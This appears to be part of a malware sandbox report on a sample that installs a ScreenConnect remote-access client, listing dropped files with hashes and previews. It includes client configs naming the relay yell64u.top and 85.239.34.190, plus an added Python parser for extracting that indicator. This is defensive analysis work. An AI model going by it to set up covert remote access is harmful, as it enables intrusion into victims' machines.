                                                                                            SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                            MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                            SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                            SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                            SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):57344
                                                                                            Entropy (8bit):4.657268358041957
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                            MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                            SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                            SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                            SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):176128
                                                                                            Entropy (8bit):5.775360792482692
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                            MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                            SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                            SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                            SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):548864
                                                                                            Entropy (8bit):6.031251664661689
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                            MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                            SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                            SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                            SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):11776
                                                                                            Entropy (8bit):5.267782165666963
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                            MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                            SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                            SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                            SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1721856
                                                                                            Entropy (8bit):6.639136400085158
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                            MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                            SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                            SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                            SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Users\user\Desktop\statmentt.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2750A569-82DB-B303-FEC6-22A2E87A0AD0}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):13422592
                                                                                            Entropy (8bit):7.966821687517632
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:h53JLR3LGMLiW35u53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J8:bTiuiTXTtTPTkTQT
                                                                                            MD5:1D7F2E9CB1593817ACA25DD8447446AF
                                                                                            SHA1:7776A30B10759290F400D3556E5DF445D6BD9BC6
                                                                                            SHA-256:BB9E2A51B04C524685F9B36D89B35FB6F1AB1DFED05ACB568FCDA7D086BA67F5
                                                                                            SHA-512:40E1A05696EA70766AD9B817246444457FA7EC9EE3B387F74917E206C852B4DFF87334645FED4DECD9374A2AAC75FFA934BFC262BA171E41896F8462FF5BF0DC
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2750A569-82DB-B303-FEC6-22A2E87A0AD0}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):13422592
                                                                                            Entropy (8bit):7.966821687517632
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:h53JLR3LGMLiW35u53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J8:bTiuiTXTtTPTkTQT
                                                                                            MD5:1D7F2E9CB1593817ACA25DD8447446AF
                                                                                            SHA1:7776A30B10759290F400D3556E5DF445D6BD9BC6
                                                                                            SHA-256:BB9E2A51B04C524685F9B36D89B35FB6F1AB1DFED05ACB568FCDA7D086BA67F5
                                                                                            SHA-512:40E1A05696EA70766AD9B817246444457FA7EC9EE3B387F74917E206C852B4DFF87334645FED4DECD9374A2AAC75FFA934BFC262BA171E41896F8462FF5BF0DC
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {2750A569-82DB-B303-FEC6-22A2E87A0AD0}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):13422592
                                                                                            Entropy (8bit):7.966821687517632
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:h53JLR3LGMLiW35u53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J8:bTiuiTXTtTPTkTQT
                                                                                            MD5:1D7F2E9CB1593817ACA25DD8447446AF
                                                                                            SHA1:7776A30B10759290F400D3556E5DF445D6BD9BC6
                                                                                            SHA-256:BB9E2A51B04C524685F9B36D89B35FB6F1AB1DFED05ACB568FCDA7D086BA67F5
                                                                                            SHA-512:40E1A05696EA70766AD9B817246444457FA7EC9EE3B387F74917E206C852B4DFF87334645FED4DECD9374A2AAC75FFA934BFC262BA171E41896F8462FF5BF0DC
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):431086
                                                                                            Entropy (8bit):6.617567524928143
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:h1uH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv6ssM:7uH2anwohwQUv5uH2anwohwQUv6ssM
                                                                                            MD5:7BB98CED2F4D6D63C34FD0465943DD5B
                                                                                            SHA1:B9612C88F44D292D3EBEB70482B4E24B9089836B
                                                                                            SHA-256:8DC6BA6DFE502647E8004CF6E0784D641050C2C1323EA65E578480BF366F6014
                                                                                            SHA-512:5C9321601429EE7C96C6800BC03D8F0C11955F3834524377089A791D6FAFCA84E3B583126ACD036B13046365A5F4533AE6445A99FD04582245DDC0332F336DAA
                                                                                            Malicious:false
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSIF458.tmp, Author: Joe Security
                                                                                            Preview:...@IXOS.@.....@.[.Y.@.....@.....@.....@.....@.....@......&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):207360
                                                                                            Entropy (8bit):6.573348437503042
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):207360
                                                                                            Entropy (8bit):6.573348437503042
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                            MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                            SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                            SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                            SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):1.1626473333022682
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:JSbX72FjCuAGiLIlHVRpMh/7777777777777777777777777vDHFi6nq+lp3Xl0G:JLQI5ck6nhb6F
                                                                                            MD5:D865E01106131A766EC7051CDC3D356C
                                                                                            SHA1:EF6CE74C77679AB99E531E63AB395A24A29B7282
                                                                                            SHA-256:EF51C21889F88F05CB45FD5349ACD05417036A0EDC5B6F9CF1BCED429F4CCB3A
                                                                                            SHA-512:C864AEF5D3A74D2642AB23D59D855A6D999606F3E86CD5389954B147E649557A2C6A228C47A94AB52FD9AD8318B80D5BE356ADC33CA04630EF3D09C001EC1C6B
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):1.796581217563304
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:r8PhDuRc06WX4ujT5Gh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSK:ShD1ejTGruhpYf6dwLmm349H
                                                                                            MD5:CC2ADC2329B5D81AE3EDBAB92BACB16B
                                                                                            SHA1:D69DD4BA7C4B5619EA4F7419ECD6C5BAC6F8E369
                                                                                            SHA-256:3DA7EC8475AED1626F7552EED5A3BECCA51D796A11B0B95039F16811DB9AE40D
                                                                                            SHA-512:0517C84494ECD85C8B4C24C1A994AEED2DD8CE9D085C8E2F659FD5AF1617483D157DDFEF50BF4F32079097C6E7740DA37E33424694F4567BC9A0467CD7B21BE3
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                                            Category:dropped
                                                                                            Size (bytes):7668
                                                                                            Entropy (8bit):7.864444854228408
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                                            MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                                            SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                                            SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                                            SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):432221
                                                                                            Entropy (8bit):5.37517317223772
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauW:zTtbmkExhMJCIpErP
                                                                                            MD5:C1F957C64CB829A7B7B4A353E95C6F07
                                                                                            SHA1:FB8FE9AB76BE905694E331119494B486D3E35B26
                                                                                            SHA-256:FC4E019236C62E8DC19CD31129A20D8270F614EF071F8266E49D3897B3D2A7EC
                                                                                            SHA-512:8FA1B4E7C2FCB2D8E212110E5AAD87E41F12FC86CAD47A4E6721FBF6BFFCFB28AD06D5C13DB07760E5627D66CB3D3A668EAA080DB7FB96514F1E8DAD14F2019B
                                                                                            Malicious:false
                                                                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

Process: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 556
Entropy (8bit): 5.044514242750178
Encrypted: false
SSDEEP: 12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiiUgQv/vXbAa3xT:2dL9hK6E46YP67V3vH
MD5: 4A2EA206D76A01F69F353277EE798DCD
SHA1: 226946F88022B677666B506BC3CAB283E5638DB4
SHA-256: 87727217583916FCE19E1538EBF26428E593BFDD01F34052A01F36644553E2E8
SHA-512: 314AE5F3A396A3525C7844B9530FA726A4F134EC12A83172905BF0A1C1B659295F5A09A4B43750017F2780B1D21C5BD261119CEC6141B8C6872F9994E07A3662
Malicious: false
Preview (CRLF shown as line breaks):
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>yell64u.top=85.239.34.190-19%2f12%2f2024%2016%3a29%3a15</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>

Process: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 556
Entropy (8bit): 5.044514242750178
Encrypted: false
SSDEEP: 12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiiUgQv/vXbAa3xT:2dL9hK6E46YP67V3vH
MD5: 4A2EA206D76A01F69F353277EE798DCD
SHA1: 226946F88022B677666B506BC3CAB283E5638DB4
SHA-256: 87727217583916FCE19E1538EBF26428E593BFDD01F34052A01F36644553E2E8
SHA-512: 314AE5F3A396A3525C7844B9530FA726A4F134EC12A83172905BF0A1C1B659295F5A09A4B43750017F2780B1D21C5BD261119CEC6141B8C6872F9994E07A3662
Malicious: false
Preview (CRLF shown as line breaks):
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>yell64u.top=85.239.34.190-19%2f12%2f2024%2016%3a29%3a15</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
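The two ScreenConnect client configuration files above carry the most useful indicator in this part of the report: the HostToAddressMap setting, which the client writes as a URL-encoded "host=address-timestamp" string (yell64u.top resolving to 85.239.34.190). The following is an added example, not code from the Joe Sandbox report or from ConnectWise, that parses a config of this shape into structured indicators for blocking or hunting. Two assumptions are made from the single value the report shows: the part after "-" is the time the client recorded the resolution, and its layout is day/month/year (19 cannot be a month); the sample config is constructed from the report's preview with the CRLFs restored.

```python
"""Pull the relay indicator out of a dropped ScreenConnect client config.

Added example; not code from the Joe Sandbox report or from ConnectWise.
The HostToAddressMap value is read as "<host>=<ip>-<url-encoded timestamp>"
and the timestamp as day/month/year, both inferred from the one value shown.
"""
import ipaddress
import urllib.parse
import xml.etree.ElementTree as ET
from datetime import datetime
from typing import Optional

# Constructed from the report's preview of the dropped config, with the
# CRLFs the preview renders as ".." restored.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="HostToAddressMap" serializeAs="String">
      <value>yell64u.top=85.239.34.190-19%2f12%2f2024%2016%3a29%3a15</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
"""

# Assumed layout, inferred from "19/12/2024 16:29:15" in the sample.
TIMESTAMP_FORMAT = "%d/%m/%Y %H:%M:%S"


def get_setting(config_xml: str, name: str) -> Optional[str]:
    """Return the <value> text of <setting name=...> anywhere in the config, or None."""
    root = ET.fromstring(config_xml.encode("utf-8"))
    for setting in root.iter("setting"):
        if setting.get("name") == name:
            value = setting.find("value")
            return value.text if value is not None else None
    return None


def parse_host_to_address_map(raw: str) -> dict:
    """Decode one "host=ip-timestamp" mapping into host, IP and datetime."""
    decoded = urllib.parse.unquote(raw)      # %2f -> "/", %20 -> " ", %3a -> ":"
    host, _, rest = decoded.partition("=")
    address, _, stamp = rest.partition("-")  # an IP literal never contains "-"
    if not host or not address:
        raise ValueError(f"unexpected HostToAddressMap entry: {raw!r}")
    return {
        "host": host.strip().lower(),
        # ip_address() rejects anything that is not an IPv4/IPv6 literal
        "ip": str(ipaddress.ip_address(address.strip())),
        "resolved_at": datetime.strptime(stamp.strip(), TIMESTAMP_FORMAT) if stamp else None,
    }


def extract_relay(config_xml: str) -> Optional[dict]:
    """Convenience wrapper: config text in, indicator dict (or None) out."""
    raw = get_setting(config_xml, "HostToAddressMap")
    return parse_host_to_address_map(raw) if raw else None


if __name__ == "__main__":
    relay = extract_relay(SAMPLE_CONFIG)
    print(f"domain={relay['host']} ip={relay['ip']} "
          f"resolved_at={relay['resolved_at']:%Y-%m-%dT%H:%M:%S}")
```

On a live host the same function can be pointed at the ScreenConnect.ClientService.exe.config under the "ScreenConnect Client (<id>)" directory; the domain and IP are the values to block, while the recorded time gives a lower bound for when the client first reached its relay.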

Process: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1590
Entropy (8bit): 5.363907225770245
Encrypted: false
SSDEEP: 48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
MD5: E88F0E3AD82AC5F6557398EBC137B0DE
SHA1: 20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
SHA-256: 278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
SHA-512: CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
Malicious: false
Preview (CRLF shown as line breaks):
1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0
3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0
3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0
2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture

Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 69632
Entropy (8bit): 0.23279667478543342
Encrypted: false
SSDEEP: 48:AGRDBAduNS3qcq56AduNSiA1dZq+ommXrz4UVRosrzHwyuJ9pE:flxpYf6dwLmm34eru
MD5: FA809988D848F8184162E937481289E4
SHA1: 6364D4ADB23EA4C8EB009B03857726A910D9C11B
SHA-256: 5663C3889B7E7935D077749A10A00EAEB0980176B770366CA68CFD24B807D00F
SHA-512: 5235C13B27197319E2B15A03CCAE1E718355B7F9C58F72D8C3CF4CE1F39DEE31509ECD5D78B53FA74C06783C471FAF29D0BECD747930024172D0BD22E0DF40AF
Malicious: false
Preview: binary (every byte in the shown prefix is non-printable and rendered as '.')

